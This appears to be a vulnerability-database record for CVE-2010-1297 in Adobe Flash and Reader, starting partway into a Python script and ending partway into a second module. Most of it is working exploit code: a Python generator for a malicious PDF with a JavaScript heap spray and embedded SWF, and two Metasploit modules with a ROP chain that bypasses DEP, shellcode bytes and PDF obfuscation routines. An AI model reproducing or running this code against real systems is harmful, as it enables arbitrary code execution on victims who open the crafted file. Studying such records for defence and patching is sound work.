(pointers.length + 20); \npointerSled = pointerSled.substring(0, pointerSled_len); \nheap_chunks = new Array(); \nfor (var i = 0 ; i < <CHUNKS> ; i++) \nheap_chunks[i] = pointerSled + pointers; \n} \n \n \nspray_heap(); \n''' \n \nspray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX \n''' \nAuthplay.dll \n \n303033DD ? 87DC XCHG ESP,EBX \n \n############################################################# \nwill do nothing \n \n303033DF ? 45 INC EBP \n303033E0 ? 05 00898784 ADD EAX,84878900 \n303033E5 ? 42 INC EDX \n303033E6 ? 05 008987E8 ADD EAX,E8878900 \n303033EB ? 41 INC ECX \n303033EC ? 05 008987EC ADD EAX,EC878900 \n303033F1 ? 41 INC ECX \n303033F2 ? 05 008987F0 ADD EAX,F0878900 \n303033F7 ? 41 INC ECX \n303033F8 ? 05 008987F4 ADD EAX,F4878900 \n303033FD ? 41 INC ECX \n303033FE ? 05 005F5E5D ADD EAX,5D5E5F00 \n30303403 . B8 01000000 MOV EAX,1 \n30303408 . 5B POP EBX \n############################################################ \n \n30303409 . 83C4 30 ADD ESP,30 \n3030340C . C3 RETN \n \n''' \n \nspray = spray.replace('<CHUNKS>', '40') #Chunk count \nreturn spray \n \ndef generate_pdf(): \nexploit = Exploit() \nswfFile = 'exploit.swf' \npdf = PDF() \npdf.header() \npdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1) \n#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1) \npdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1) \npdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + \" /Type/Page\"+' /Contents '+pdf.ref(4) ,1) \npdf.obj_Stream(4, '','') \npdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1) \npdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1) \npdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1) \npdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1) \npdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1) \npdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1) \npdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1) \npdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1) \npdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1) \npdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() ) \npdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1) \npdf.obj_Stream(16, '<</Length 0 >> ','') \npdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1) \n \npdf.xref() \npdf.trailer() \nreturn pdf.generate() \n \ndef main(): \nif len(sys.argv) != 2: \nprint 'Usage: python %s [output file name]' % sys.argv[0] \nsys.exit(0) \nfile_name = sys.argv[1] \nif not file_name.endswith('.pdf'): \nfile_name = file_name + '.pdf' \ntry: \nfd = open(file_name, 'wb+') \nfd.write(generate_pdf()) \nfd.close() \nprint '[-] PDF file generated and written to %s' % file_name \nexcept IOError: \nprint '[*] Error : An IO error has occurred' \nprint '[-] Exiting ...' \nsys.exit(-1) \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/93394/moaub-adobenewclass.txt"}], "exploitdb": [{"lastseen": "2016-02-02T06:16:11", "description": "Adobe Flash Player \"newfunction\" Invalid Pointer Use. CVE-2010-1297. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-25T00:00:00", "id": "EDB-ID:16687", "href": "https://www.exploit-db.com/exploits/16687/", "sourceData": "##\r\n# $Id: adobe_flashplayer_newfunction.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\r\n\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\r\n\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-1297'],\r\n\t\t\t\t\t['OSVDB', '65141'],\r\n\t\t\t\t\t['BID', '40586'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 04 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tswf_data = make_swf()\r\n\t\tjs_data = make_js(payload.encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(swf_data, js_data)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef make_swf\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\tswf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tswf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\t#pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog\")\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(5)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\")\r\n\t\tpdf << nObfu(\"/Rect [20 20 187 69] \")\r\n\t\tpdf << nObfu(\"/RichMediaSettings \") << ioRef(8)\r\n\t\tpdf << nObfu(\"/RichMediaContent \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Activation \") << ioRef(10)\r\n\t\tpdf << nObfu(\"/Deactivation \") << ioRef(11)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaContent\")\r\n\t\tpdf << nObfu(\"/Assets \") << ioRef(12)\r\n\t\tpdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\"\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Asset \") << ioRef(13)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16687/"}, {"lastseen": "2016-02-02T06:05:15", "description": "Adobe Flash Player \"newfunction\" Invalid Pointer Use. CVE-2010-1297. Local exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16614", "href": "https://www.exploit-db.com/exploits/16614/", "sourceData": "##\r\n# $Id: adobe_flashplayer_newfunction.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\r\n\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\r\n\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-1297'],\r\n\t\t\t\t\t['OSVDB', '65141'],\r\n\t\t\t\t\t['BID', '40586'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 04 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-1297.swf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\t@swf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status(\"Sending crafted PDF w/SWF to #{cli.peerhost}:#{cli.peerport}\")\r\n\r\n\t\tjs_data = make_js(regenerate_payload(cli).encoded)\r\n\t\tpdf_data = make_pdf(@swf_data, js_data)\r\n\t\tsend_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / 